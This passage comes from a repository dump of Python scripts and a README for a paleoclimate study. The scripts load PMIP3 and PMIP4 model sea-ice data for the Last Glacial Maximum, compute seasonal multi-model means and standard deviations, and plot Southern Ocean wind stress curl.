ax[1].plot(Dynamically_PMIP3_sie[i],Dynamically_PMIP3[i].where(curl.LAT==Dynamically_PMIP3_sie[i],drop=True),marker='o',color=Dynamically_PMIP3_colors[i],markeredgecolor='k')\nfor i in range(len(Dynamically_PMIP4)):\n ax[1].plot(PMIP3_bad.LAT,Dynamically_PMIP4[i],color=Dynamically_PMIP4_colors[i])\n ax[1].plot(Dynamically_PMIP4_sie[i],Dynamically_PMIP4[i].where(curl.LAT==Dynamically_PMIP4_sie[i],drop=True),marker='o',color=Dynamically_PMIP4_colors[i],markeredgecolor='k')\n#ax[1].legend(handles=[MIROC4_leg,IPSL4_leg,MPI4_leg,AWI_leg,LOVE_leg,CESM_leg,CCSM4UoT_leg])\n\nfor i in range(len(LOVE)):\n ax[1].plot(PMIP3_bad.LAT,LOVE[i],color=LOVE_colors[i],ls = LOVE_linestyle[i])\n ax[1].plot(LOVE_sie[i],LOVE[i].where(curl.LAT==LOVE_sie[i],drop=True),marker='o',color=LOVE_colors[i],markeredgecolor='k')\n\n# ax[2].legend(handles=[weakNA_leg,weakNA_AB_leg])\n\n# for i in range(3):\n# ax[i].text(-76.5,0.5,'Antarctic coast',rotation='vertical',fontsize=10,fontweight='bold')\n\nax[1].text(-76.5,0.5,'Antarctic coast',rotation='vertical',fontsize=10,fontweight='bold')\nax[0].text(-76.5,0.5,'Antarctic coast',rotation='vertical',fontsize=10,fontweight='bold')\nax[0].text(-79,2.2,'a)',fontsize=10,fontweight='bold')\nax[1].text(-79,2.2,'b)',fontsize=10,fontweight='bold')\n#ax[2].text(-79,2.2,'c)',fontsize=10,fontweight='bold')\nax[0].set_title('Thermodynamically driven models',fontsize=15,fontweight='bold')\nax[0].legend(handles=[PMIP4legend,PMIP3legend,CNRM_legend,MIROC_legend,GISS_legend,IPSL_legend,CESM_legend,CCSM4_legend],ncol=3)\n\nax[1].set_title('Dynamically driven models',fontsize=15,fontweight='bold')\n#ax[2].set_title('LOVECLIM sensitivity runs',fontsize=15,fontweight='bold')\nax[1].legend(handles=[PMIP4legend,PMIP3legend,MPI_legend,MRI_legend,FGOALS_legend,AWI_legend,LOVE_legend,LOVE1_legend,LOVE2_legend],ncol=3)\nplt.tight_layout(pad=2.2)\n\n# add labels\nfig.add_subplot(111, frameon=False)\n# hide tick and tick label of the big axes\nplt.tick_params(labelcolor='none', top=False, bottom=False, left=False, right=False)\nplt.grid(False)\nplt.ylabel(\"Wind Stress Curl (m/s)\",fontsize=15,fontweight='bold')\nplt.xlabel(\"Latitude (˚ S)\",fontsize=15,fontweight='bold')\n\nplt.show()\n#plt.savefig('Figures/Figure5_separate.pdf')\n"
},
{
"alpha_fraction": 0.76408451795578,
"alphanum_fraction": 0.7957746386528015,
"avg_line_length": 283,
"blob_id": "d20d419a439dde70c6e055c84572a2e34c487088",
"content_id": "0f6960d51b087a1e1abf74cc6c9c68ce96ba27ca",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 284,
"license_type": "no_license",
"max_line_length": 283,
"num_lines": 1,
"path": "/README.md",
"repo_name": "RyanAGreen/PMIP_seaice",
"src_encoding": "UTF-8",
"text": "This repository contains the plotting code for our manuscript titled \"Evaluating seasonal sea-ice cover over the Southern Ocean at the Last Glacial Maximum\", published in *Climate of the Past*. The full manuscript can be found [here](https://cp.copernicus.org/articles/18/845/2022/).\n"
},
{
"alpha_fraction": 0.6572666764259338,
"alphanum_fraction": 0.716124415397644,
"avg_line_length": 43.814491271972656,
"blob_id": "1cc3b9d639eba09305e3c02f0b3a27d9823cad78",
"content_id": "27e5b650c3e27dc603fa4989e6902cdff8eaa29f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 15461,
"license_type": "no_license",
"max_line_length": 162,
"num_lines": 345,
"path": "/ConvertNetCDF.py",
"repo_name": "RyanAGreen/PMIP_seaice",
"src_encoding": "UTF-8",
"text": "# two columns PMIP\nimport numpy as np\nfrom matplotlib import pyplot as plt\nimport pandas as pd\nimport xarray as xr\nimport cartopy.crs as ccrs\nimport cartopy\nimport cartopy.feature as cfeature\nimport matplotlib.ticker as mticker\nfrom cartopy.mpl.gridliner import LONGITUDE_FORMATTER, LATITUDE_FORMATTER\nimport matplotlib.path as mpath\nimport matplotlib.lines as mlines\n\n# load in PMIP3 data\nCNRM_3 = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/sic_OIclim_CNRM-CM5_lgm_r1i1p1_180001-199912-climregrid.nc',decode_times=False)\nFGOALS_3 = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/sic_OIclim_FGOALS-g2_lgm_r1i1p1_055001-064912-climregrid.nc',decode_times=False)\nIPSL_3 = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/sic_OIclim_IPSL-CM5A-LR_lgm_r1i1p1_260101-280012-climregrid.nc',decode_times=False)\nMIROC_3 = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/sic_OIclim_MIROC-ESM_lgm_r1i1p1_460001-469912-climregrid.nc',decode_times=False)\nMRI_3 = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/sic_OIclim_MRI-CGCM3_lgm_r1i1p1_250101-260012-climregrid.nc',decode_times=False)\n\nLOVE1_sum_3 = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/LOVE1_albq_summer.nc',decode_times=False) # check if this is loveclim1 or 2\nfeb = LOVE1_sum_3.FEB.mean(dim='AX005')\nmar = LOVE1_sum_3.MAR.mean(dim='AX006')\nLOVE1_sum_3 = (mar + feb)/2\n\nLOVE1_win_3 = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/V3LNAwSeaIceConcWinter.nc',decode_times=False) # check if this is loveclim1 or 2\njul = LOVE1_win_3.ALJUL.mean(dim='AX007')\naug2 = LOVE1_win_3.ALAUG.mean(dim='AX008')\nLOVE1_win_3 = (jul + aug2)/2\n\n#### Summer\n\n# data sets with preset variables\nCCSM4_sum_3 = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/2MonthMinimum-sic-CCSM4_lgm.nc',decode_times=False)\nCCSM4_sum_3 = (CCSM4_sum_3.S1A + CCSM4_sum_3.S1B)/2\nGISS_sum_3 = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/2MonthMinimum-sic-GISS_lgm.nc',decode_times=False)\nGISS_sum_3 = (GISS_sum_3.S2A + GISS_sum_3.S2B)/2\nMPI_sum_3 = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/2MonthMinimum-sic-MPI_lgm.nc',decode_times=False)\nMPI_sum_3 = (MPI_sum_3.S3A + MPI_sum_3.S3B)/2\n\n\n# original data file that has 12 time points\nCNRM_3_sum = xr.concat([CNRM_3.sel(time=(CNRM_3.time[1])), CNRM_3.sel(time=(CNRM_3.time[2]))], dim=\"time\")\nCNRM_3_sum = CNRM_3_sum.mean(dim='time') # or whatever the time axis is called for this variable (different for loveclim)\nFGOALS_3_sum = xr.concat([FGOALS_3.sel(time=(FGOALS_3.time[2])), FGOALS_3.sel(time=(FGOALS_3.time[3]))], dim=\"time\")\nFGOALS_3_sum = FGOALS_3_sum.mean(dim='time')\nIPSL_3_sum = xr.concat([IPSL_3.sel(time=(IPSL_3.time[1])), IPSL_3.sel(time=(IPSL_3.time[2]))], dim=\"time\")\nIPSL_3_sum = IPSL_3_sum.mean(dim='time')\nMIROC_3_sum = xr.concat([MIROC_3.sel(time=(MIROC_3.time[1])), MIROC_3.sel(time=(MIROC_3.time[2]))], dim=\"time\")\nMIROC_3_sum = MIROC_3_sum.mean(dim='time')\nMRI_3_sum = xr.concat([MRI_3.sel(time=(MRI_3.time[1])), MRI_3.sel(time=(MRI_3.time[2]))], dim=\"time\")\nMRI_3_sum = MRI_3_sum.mean(dim='time')\nLOVE2_sum_3 = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/V3LNAwSOwSHWwSeaIceConcSUMMER.nc',decode_times=False) # check if this is loveclim1 or 2\naug = LOVE2_sum_3.ALFEB.mean(dim='AX005')\nsep = LOVE2_sum_3.ALMAR.mean(dim='AX006')\nLOVE2_sum_3 = (aug + sep)/2\n\n\n\n# Multi model mean\nMMM_sum = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/AnnualMinimum15%.nc',decode_times=False)\n\n#### Winter\n\n# data sets with preset variables\n# data sets with preset variables\nCCSM4_win_3 = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/2MonthMaximum-sic-CCSM4_lgm.nc',decode_times=False)\nCCSM4_win_3 = (CCSM4_win_3.S1A + CCSM4_win_3.S1B)/2\nGISS_win_3 = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/2MonthMaximum-sic-GISS_lgm.nc',decode_times=False)\nGISS_win_3 = (GISS_win_3.S2A + GISS_win_3.S2B)/2\nGISS_win_3 = GISS_win_3.isel(LAT=(GISS_win_3.LAT > -70))\nMPI_win_3 = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/2MonthMaximum-sic-MPI_lgm.nc',decode_times=False)\nMPI_win_3 = (MPI_win_3.S3A + MPI_win_3.S3B)/2\n\n\n# original data file that has 12 time points\nCNRM_3_win = xr.concat([CNRM_3.sel(time=(CNRM_3.time[8])), CNRM_3.sel(time=(CNRM_3.time[9]))], dim=\"time\")\nCNRM_3_win = CNRM_3_win.mean(dim='time') # or whatever the time axis is called for this variable (different for loveclim)\nFGOALS_3_win = xr.concat([FGOALS_3.sel(time=(FGOALS_3.time[8])), FGOALS_3.sel(time=(FGOALS_3.time[9]))], dim=\"time\")\nFGOALS_3_win = FGOALS_3_win.mean(dim='time')\nFGOALS_3_win = FGOALS_3_win.isel(lat=(FGOALS_3_win.lat > -70))\nIPSL_3_win = xr.concat([IPSL_3.sel(time=(IPSL_3.time[7])), IPSL_3.sel(time=(IPSL_3.time[8]))], dim=\"time\")\nIPSL_3_win = IPSL_3_win.mean(dim='time')\nMIROC_3_win = xr.concat([MIROC_3.sel(time=(MIROC_3.time[8])), MIROC_3.sel(time=(MIROC_3.time[9]))], dim=\"time\")\nMIROC_3_win = MIROC_3_win.mean(dim='time')\nMRI_3_win = xr.concat([MRI_3.sel(time=(MRI_3.time[8])), MRI_3.sel(time=(MRI_3.time[9]))], dim=\"time\")\nMRI_3_win = MRI_3_win.mean(dim='time')\nMRI_3_win = MRI_3_win.isel(lat=(MRI_3_win.lat > -70))\nLOVE2_win_3 = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/V3LNAwSOwSHWwSeaIceConcWINTER.nc',decode_times=False) # check if this is loveclim1 or 2\naug = LOVE2_win_3.ALAUG.mean(dim='AX005')\nsep = LOVE2_win_3.ALSEP.mean(dim='AX006')\nLOVE2_win_3 = (aug + sep)/2\n\n\n# Multi model mean winter\nMMM_win = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/AnnualMaximum15%.nc',decode_times=False)\n\n# load in PMIP4 data\n\niLOVECLIM = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/PMIP4seaice/cresum18250_regrid.nc',decode_times=False)\nLOVEsic = iLOVECLIM.albq\nfeb = LOVEsic[1:2400:12]\nmar = LOVEsic[2:2400:12]\naug = LOVEsic[7:2400:12]\nsep = LOVEsic[8:2400:12]\nmar = mar.mean(dim='time')\nfeb = feb.mean(dim='time')\nsep = sep.mean(dim='time')\naug = aug.mean(dim='time')\nLOVEsummer = (mar+feb)/2\nLOVEwinter = (sep + aug)/2\nLOVEsummer = LOVEsummer * 100\nLOVEwinter = LOVEwinter * 100\n\n\nAWI = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/PMIP4seaice/AWI_PMIP4_siconca_regrid.nc',decode_times=False)\nMIROC = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/PMIP4seaice/MIROC_PMIP4_siconc_regrid.nc',decode_times=False)\nMPI = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/PMIP4seaice/MPIPMIP4_siconc_regrid.nc',decode_times=False)\nCESM12 = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/PMIP4seaice/b.e12.B1850C5.f19_g16.i21ka.03.pop.h.vars.08010900.climo_regrid.nc',decode_times=False)\nCCSM4UoT = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/PMIP4seaice/siconc_SImon_UofT-CCSM4_lgm_r1i1p1f1_gn_110101-120012_regrid.nc',decode_times=False)\nIPSL = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/PMIP4seaice/IPSLCM5A2_LGM_regrid.nc',decode_times=False)\n\n\n# datasets that need to be averaged over 2 month period\nAWI_winter = xr.concat([AWI.sel(time=(AWI.time[7::12])), AWI.sel(time=(AWI.time[8::12]))], dim=\"time\") # August September\nAWI_winter = AWI_winter.mean(dim='time')\nAWI_winter = AWI_winter.isel(lat=(AWI_winter.lat > -70))\nAWI_summer = xr.concat([AWI.sel(time=(AWI.time[1::12])), AWI.sel(time=(AWI.time[2::12]))], dim=\"time\") # Feb March\nAWI_summer = AWI_summer.mean(dim='time')\n\nMIROC_winter = xr.concat([MIROC.sel(time=(MIROC.time[8::12])), MIROC.sel(time=(MIROC.time[9::12]))], dim=\"time\") # Sep october\nMIROC_winter = MIROC_winter.mean(dim='time')\nMIROC_summer = xr.concat([MIROC.sel(time=(MIROC.time[1::12])), MIROC.sel(time=(MIROC.time[2::12]))], dim=\"time\") # Feb march\nMIROC_summer = MIROC_summer.mean(dim='time')\n\nMPI_winter = xr.concat([MPI.sel(time=(MPI.time[8::12])), MPI.sel(time=(MPI.time[9::12]))], dim=\"time\")\nMPI_winter = MPI_winter.mean(dim='time')\nMPI_summer = xr.concat([MPI.sel(time=(MPI.time[1::12])), MPI.sel(time=(MPI.time[2::12]))], dim=\"time\")\nMPI_summer = MPI_summer.mean(dim='time')\n\nCESM12_winter = xr.concat([CESM12.sel(time=(CESM12.time[7])), CESM12.sel(time=(CESM12.time[8]))], dim=\"time\")\nCESM12_winter = CESM12_winter.mean(dim='time')\nCESM12_summer = xr.concat([CESM12.sel(time=(CESM12.time[1])), CESM12.sel(time=(CESM12.time[2]))], dim=\"time\")\nCESM12_summer = CESM12_summer.mean(dim='time')\n\nCCSM4UoT_winter = xr.concat([CCSM4UoT.sel(time=(CCSM4UoT.time[8::12])), CCSM4UoT.sel(time=(CCSM4UoT.time[9::12]))], dim=\"time\")\nCCSM4UoT_winter = CCSM4UoT_winter.mean(dim='time')\nCCSM4UoT_summer = xr.concat([CCSM4UoT.sel(time=(CCSM4UoT.time[2::12])), CCSM4UoT.sel(time=(CCSM4UoT.time[3::12]))], dim=\"time\")\nCCSM4UoT_summer = CCSM4UoT_summer.mean(dim='time')\n\nIPSL_winter = xr.concat([IPSL.sel(time_counter=(IPSL.time_counter[7])), IPSL.sel(time_counter=(IPSL.time_counter[8]))], dim=\"time_counter\") # August September\nIPSL_winter = IPSL_winter.mean(dim='time_counter')\nIPSL_winter = IPSL_winter.isel(lat=(IPSL_winter.lat > -70))\nIPSL_summer = xr.concat([IPSL.sel(time_counter=(IPSL.time_counter[1])), IPSL.sel(time_counter=(IPSL.time_counter[2]))], dim=\"time_counter\") # Feb March\nIPSL_summer = IPSL_summer.mean(dim='time_counter')\n\n#####################\n\n#####PMIP3#####\n# austral summer MMM\nMMM_CCSM4 = (MMM_sum.CCSM4R2 + MMM_sum.CCSM4R1)/2\nMMM_GISS = (MMM_sum.GISSP150 + MMM_sum.GISSP151)/2\nMMM_MPI = (MMM_sum.MPIP1 + MMM_sum.MPIP2)/2\nMMM_sum['CCSM4'] = MMM_CCSM4\nMMM_sum['GISS'] = MMM_GISS\nMMM_sum['MPI'] = MMM_MPI\nMMM_sum = MMM_sum.drop_vars('CCSM4R1')\nMMM_sum = MMM_sum.drop_vars('CCSM4R2')\nMMM_sum = MMM_sum.drop_vars('GISSP150')\nMMM_sum = MMM_sum.drop_vars('GISSP151')\nMMM_sum = MMM_sum.drop_vars('MPIP1')\nMMM_sum = MMM_sum.drop_vars('MPIP2')\nMMM_LOVE1_sum_3 = LOVE1_sum_3*100\nMMM_LOVE2_sum_3 = LOVE2_sum_3*100\n\n# multi model mean\nMMM_sum_mean = (MMM_sum.CNRM + MMM_sum.FGOALS + MMM_sum.IPSL + MMM_sum.MIROC + MMM_sum.MRI + MMM_sum.CCSM4 + MMM_sum.MPI + MMM_sum.GISS)/8\n\n# calculating STD\nvar1=(MMM_sum.CCSM4-MMM_sum_mean)**2\nvar2=(MMM_sum.GISS-MMM_sum_mean)**2\nvar3=(MMM_sum.MPI-MMM_sum_mean)**2\nvar4=(MMM_sum.CNRM-MMM_sum_mean)**2\nvar5=(MMM_sum.FGOALS-MMM_sum_mean)**2\nvar6=(MMM_sum.IPSL-MMM_sum_mean)**2\nvar7=(MMM_sum.MIROC-MMM_sum_mean)**2\nvar8=(MMM_sum.MRI-MMM_sum_mean)**2\nSTD=((var1+var2+var3+var4+var5+var6+var7+var8)/8)**0.5\nSTD2=(MMM_sum_mean+STD)\nSTD3=(MMM_sum_mean-STD)\n\nMMM_summer_PMIP3 = MMM_sum_mean\nSTD_MMM_summer_PMIP3 = STD2\nMMM_summer_PMIP3_STD = STD3\n\nMMM_summer_PMIP3 = MMM_summer_PMIP3.to_dataset(name='sic')\nMMM_summer_PMIP3.to_netcdf(\"MMM_STD/PMIP3_summer_MMM.nc\")\n\nSTD_MMM_summer_PMIP3 = STD_MMM_summer_PMIP3.to_dataset(name='sic')\nSTD_MMM_summer_PMIP3.to_netcdf(\"MMM_STD/PMIP3_summer_STD_MMM.nc\")\n\nMMM_summer_PMIP3_STD = MMM_summer_PMIP3_STD.to_dataset(name='sic')\nMMM_summer_PMIP3_STD.to_netcdf(\"MMM_STD/PMIP3_summer_MMM_STD.nc\")\n\n# austral winter\nMMM_CCSM4 = (MMM_win.CCSM4R2 + MMM_win.CCSM4R1)/2\nMMM_GISS = (MMM_win.GISSP150 + MMM_win.GISSP151)/2\nMMM_MPI = (MMM_win.MPIP1 + MMM_win.MPIP2)/2\nMMM_win['CCSM4'] = MMM_CCSM4\nMMM_win['GISS'] = MMM_GISS\nMMM_win['MPI'] = MMM_MPI\nMMM_win = MMM_win.drop_vars('CCSM4R1')\nMMM_win = MMM_win.drop_vars('CCSM4R2')\nMMM_win = MMM_win.drop_vars('GISSP150')\nMMM_win = MMM_win.drop_vars('GISSP151')\nMMM_win = MMM_win.drop_vars('MPIP1')\nMMM_win = MMM_win.drop_vars('MPIP2')\nMMM_LOVE1_win_3 = LOVE1_win_3*100\nMMM_LOVE2_win_3 = LOVE2_win_3*100\n\n# multi model mean\nMMM_win_mean = (MMM_win.CNRM + MMM_win.FGOALS + MMM_win.IPSL + MMM_win.MIROC + MMM_win.MRI + MMM_win.CCSM4 + MMM_win.MPI + MMM_win.GISS)/8\n\n# calculating STD\nvar1=(MMM_win.CCSM4-MMM_win_mean)**2\nvar2=(MMM_win.GISS-MMM_win_mean)**2\nvar3=(MMM_win.MPI-MMM_win_mean)**2\nvar4=(MMM_win.CNRM-MMM_win_mean)**2\nvar5=(MMM_win.FGOALS-MMM_win_mean)**2\nvar6=(MMM_win.IPSL-MMM_win_mean)**2\nvar7=(MMM_win.MIROC-MMM_win_mean)**2\nvar8=(MMM_win.MRI-MMM_win_mean)**2\nSTD=((var1+var2+var3+var4+var5+var6+var7+var8)/8)**0.5\nSTD4=(MMM_win_mean+STD)\nSTD5=(MMM_win_mean-STD)\n\nMMM_winter_PMIP3 = MMM_win_mean\nSTD_MMM_winter_PMIP3 = STD4\nMMM_winter_PMIP3_STD = STD5\n\nMMM_winter_PMIP3 = MMM_winter_PMIP3.to_dataset(name='sic')\nMMM_winter_PMIP3.to_netcdf(\"MMM_STD/PMIP3_winter_MMM.nc\")\n\nSTD_MMM_winter_PMIP3 = STD_MMM_winter_PMIP3.to_dataset(name='sic')\nSTD_MMM_winter_PMIP3.to_netcdf(\"MMM_STD/PMIP3_winter_STD_MMM.nc\")\n\nMMM_winter_PMIP3_STD = MMM_winter_PMIP3_STD.to_dataset(name='sic')\nMMM_winter_PMIP3_STD.to_netcdf(\"MMM_STD/PMIP3_winter_MMM_STD.nc\")\n\n####### LOVECLIM sensitivity #####\n\n#austral summer\n\nMMM = (MMM_LOVE2_sum_3 + MMM_LOVE1_sum_3)/2\nvar1 = (MMM_LOVE1_sum_3 - MMM)**2\nvar2 = (MMM_LOVE2_sum_3 - MMM)**2\nSTD = ((var1+var2)/2)**0.5\nSTD1 = (MMM+STD)\nSTD2 = (MMM-STD)\n\nMMM_summer_LOVE = MMM\nSTD_MMM_summer_LOVE = STD1\nMMM_summer_LOVE_STD = STD2\n\nMMM_summer_LOVE = MMM_summer_LOVE.to_dataset(name='sic')\nMMM_summer_LOVE.to_netcdf(\"MMM_STD/LOVE_summer_MMM.nc\")\n\nSTD_MMM_summer_LOVE = STD_MMM_summer_LOVE.to_dataset(name='sic')\nSTD_MMM_summer_LOVE.to_netcdf(\"MMM_STD/LOVE_summer_STD_MMM.nc\")\n\nMMM_summer_LOVE_STD = MMM_summer_LOVE_STD.to_dataset(name='sic')\nMMM_summer_LOVE_STD.to_netcdf(\"MMM_STD/LOVE_summer_MMM_STD.nc\")\n\nMMM = (MMM_LOVE1_win_3 + MMM_LOVE2_win_3 )/2\nvar1 = (MMM_LOVE1_win_3 - MMM)**2\nvar2 = (MMM_LOVE2_win_3 - MMM)**2\nSTD = ((var1+var2)/2)**0.5\nSTD1 = (MMM+STD)\nSTD2 = (MMM-STD)\n\nMMM_winter_LOVE = MMM\nSTD_MMM_winter_LOVE = STD1\nMMM_winter_LOVE_STD = STD2\n\nMMM_winter_LOVE = MMM_winter_LOVE.to_dataset(name='sic')\nMMM_winter_LOVE.to_netcdf(\"MMM_STD/LOVE_winter_MMM.nc\")\n\nSTD_MMM_winter_LOVE = STD_MMM_winter_LOVE.to_dataset(name='sic')\nSTD_MMM_winter_LOVE.to_netcdf(\"MMM_STD/LOVE_winter_STD_MMM.nc\")\n\nMMM_winter_LOVE_STD = MMM_winter_LOVE_STD.to_dataset(name='sic')\nMMM_winter_LOVE_STD.to_netcdf(\"MMM_STD/LOVE_winter_MMM_STD.nc\")\n\n#### PMIP4 ########\n\nMMM_summer_mean = (CCSM4UoT_summer.siconc+CESM12_summer.IFRAC*100+LOVEsummer+AWI_summer.siconca+MPI_summer.siconc+MIROC_summer.siconc+IPSL_summer.fract_sic*100)/7\nvar1=(CCSM4UoT_summer.siconc-MMM_summer_mean)**2\nvar2=(CESM12_summer.IFRAC*100-MMM_summer_mean)**2\nvar3=(AWI_summer.siconca-MMM_summer_mean)**2\nvar4=(MPI_summer.siconc-MMM_summer_mean)**2\nvar5=(MIROC_summer.siconc-MMM_summer_mean)**2\nvar6=(IPSL_summer.fract_sic*100-MMM_summer_mean)**2\nvar7=(LOVEsummer-MMM_summer_mean)**2\nSTD=((var1+var2+var3+var4+var5+var6+var7)/7)**0.5\nSTD2=(MMM_summer_mean+STD)\nSTD3=(MMM_summer_mean-STD)\n\nMMM_summer_PMIP4 = MMM_summer_mean\nSTD_MMM_summer_PMIP4 = STD2\nMMM_summer_PMIP4_STD = STD3\n\nMMM_summer_PMIP4 = MMM_summer_PMIP4.to_dataset(name='sic')\nMMM_summer_PMIP4.to_netcdf(\"MMM_STD/PMIP4_summer_MMM.nc\")\n\nSTD_MMM_summer_PMIP4 = STD_MMM_summer_PMIP4.to_dataset(name='sic')\nSTD_MMM_summer_PMIP4.to_netcdf(\"MMM_STD/PMIP4_summer_STD_MMM.nc\")\n\nMMM_summer_PMIP4_STD = MMM_summer_PMIP4_STD.to_dataset(name='sic')\nMMM_summer_PMIP4_STD.to_netcdf(\"MMM_STD/PMIP4_summer_MMM_STD.nc\")\n\n\nMMM_winter_mean = (CCSM4UoT_winter.siconc+CESM12_winter.IFRAC*100+LOVEwinter+AWI_winter.siconca+MPI_winter.siconc+MIROC_winter.siconc+IPSL_winter.fract_sic*100)/7\nvar1=(CCSM4UoT_winter.siconc-MMM_winter_mean)**2\nvar2=(CESM12_winter.IFRAC*100-MMM_winter_mean)**2\nvar3=(AWI_winter.siconca-MMM_winter_mean)**2\nvar4=(MPI_winter.siconc-MMM_winter_mean)**2\nvar5=(MIROC_winter.siconc-MMM_winter_mean)**2\nvar6=(IPSL_winter.fract_sic*100-MMM_winter_mean)**2\nvar7=(LOVEwinter-MMM_winter_mean)**2\nSTD=((var1+var2+var3+var4+var5+var6+var7)/7)**0.5\nSTD2=(MMM_winter_mean+STD)\nSTD3=(MMM_winter_mean-STD)\n\nMMM_winter_PMIP4 = MMM_winter_mean\nSTD_MMM_winter_PMIP4 = STD2\nMMM_winter_PMIP4_STD = STD3\n\nMMM_winter_PMIP4 = MMM_winter_PMIP4.to_dataset(name='sic')\nMMM_winter_PMIP4.to_netcdf(\"MMM_STD/PMIP4_winter_MMM.nc\")\n\nSTD_MMM_winter_PMIP4 = STD_MMM_winter_PMIP4.to_dataset(name='sic')\nSTD_MMM_winter_PMIP4.to_netcdf(\"MMM_STD/PMIP4_winter_STD_MMM.nc\")\n\nMMM_winter_PMIP4_STD = MMM_winter_PMIP4_STD.to_dataset(name='sic')\nMMM_winter_PMIP4_STD.to_netcdf(\"MMM_STD/PMIP4_winter_MMM_STD.nc\")\n"
},
{
"alpha_fraction": 0.5678853392601013,
"alphanum_fraction": 0.6950233578681946,
"avg_line_length": 62.35714340209961,
"blob_id": "5c7e5e1091c675cbec8bbefca2d2b0de4a5b7b21",
"content_id": "3a52b64aba834add8095ca0590d118a48480eab1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 31045,
"license_type": "no_license",
"max_line_length": 869,
"num_lines": 490,
"path": "/Figure1.py",
"repo_name": "RyanAGreen/PMIP_seaice",
"src_encoding": "UTF-8",
"text": "# two columns PMIP\nimport numpy as np\nfrom matplotlib import pyplot as plt\nimport pandas as pd\n#%matplotlib inline\nimport xarray as xr\nimport cartopy.crs as ccrs\nimport cartopy\nimport cartopy.feature as cfeature\nimport matplotlib.ticker as mticker\nfrom cartopy.mpl.gridliner import LONGITUDE_FORMATTER, LATITUDE_FORMATTER\nimport matplotlib.path as mpath\nimport matplotlib.lines as mlines\n\n# load in PMIP3 data\nCNRM_3 = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/sic_OIclim_CNRM-CM5_lgm_r1i1p1_180001-199912-climregrid.nc',decode_times=False)\nFGOALS_3 = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/sic_OIclim_FGOALS-g2_lgm_r1i1p1_055001-064912-climregrid.nc',decode_times=False)\nIPSL_3 = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/sic_OIclim_IPSL-CM5A-LR_lgm_r1i1p1_260101-280012-climregrid.nc',decode_times=False)\nMIROC_3 = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/sic_OIclim_MIROC-ESM_lgm_r1i1p1_460001-469912-climregrid.nc',decode_times=False)\nMRI_3 = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/sic_OIclim_MRI-CGCM3_lgm_r1i1p1_250101-260012-climregrid.nc',decode_times=False)\n\nLOVE1_sum_3 = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/LOVE1_albq_summer.nc',decode_times=False) # check if this is loveclim1 or 2\nfeb = LOVE1_sum_3.FEB.mean(dim='AX005')\nmar = LOVE1_sum_3.MAR.mean(dim='AX006')\nLOVE1_sum_3 = (mar + feb)/2\n\nLOVE1_win_3 = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/V3LNAwSeaIceConcWinter.nc',decode_times=False) # check if this is loveclim1 or 2\njul = LOVE1_win_3.ALJUL.mean(dim='AX007')\naug2 = LOVE1_win_3.ALAUG.mean(dim='AX008')\nLOVE1_win_3 = (jul + aug2)/2\n\n#### Summer\n\n# data sets with preset variables\nCCSM4_sum_3 = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/2MonthMinimum-sic-CCSM4_lgm.nc',decode_times=False)\nCCSM4_sum_3 = (CCSM4_sum_3.S1A + CCSM4_sum_3.S1B)/2\nGISS_sum_3 = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/2MonthMinimum-sic-GISS_lgm.nc',decode_times=False)\nGISS_sum_3 = (GISS_sum_3.S2A + GISS_sum_3.S2B)/2\nMPI_sum_3 = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/2MonthMinimum-sic-MPI_lgm.nc',decode_times=False)\nMPI_sum_3 = (MPI_sum_3.S3A + MPI_sum_3.S3B)/2\n\n\n# original data file that has 12 time points\nCNRM_3_sum = xr.concat([CNRM_3.sel(time=(CNRM_3.time[1])), CNRM_3.sel(time=(CNRM_3.time[2]))], dim=\"time\")\nCNRM_3_sum = CNRM_3_sum.mean(dim='time') # or whatever the time axis is called for this variable (different for loveclim)\nFGOALS_3_sum = xr.concat([FGOALS_3.sel(time=(FGOALS_3.time[2])), FGOALS_3.sel(time=(FGOALS_3.time[3]))], dim=\"time\")\nFGOALS_3_sum = FGOALS_3_sum.mean(dim='time')\nIPSL_3_sum = xr.concat([IPSL_3.sel(time=(IPSL_3.time[1])), IPSL_3.sel(time=(IPSL_3.time[2]))], dim=\"time\")\nIPSL_3_sum = IPSL_3_sum.mean(dim='time')\nMIROC_3_sum = xr.concat([MIROC_3.sel(time=(MIROC_3.time[1])), MIROC_3.sel(time=(MIROC_3.time[2]))], dim=\"time\")\nMIROC_3_sum = MIROC_3_sum.mean(dim='time')\nMRI_3_sum = xr.concat([MRI_3.sel(time=(MRI_3.time[1])), MRI_3.sel(time=(MRI_3.time[2]))], dim=\"time\")\nMRI_3_sum = MRI_3_sum.mean(dim='time')\nLOVE2_sum_3 = xr.open_dataset('~/Desktop/UNSW/PMIP4Models/V3LNAwSOwSHWwSeaIceConcSUMMER.nc',decode_times=False) # check 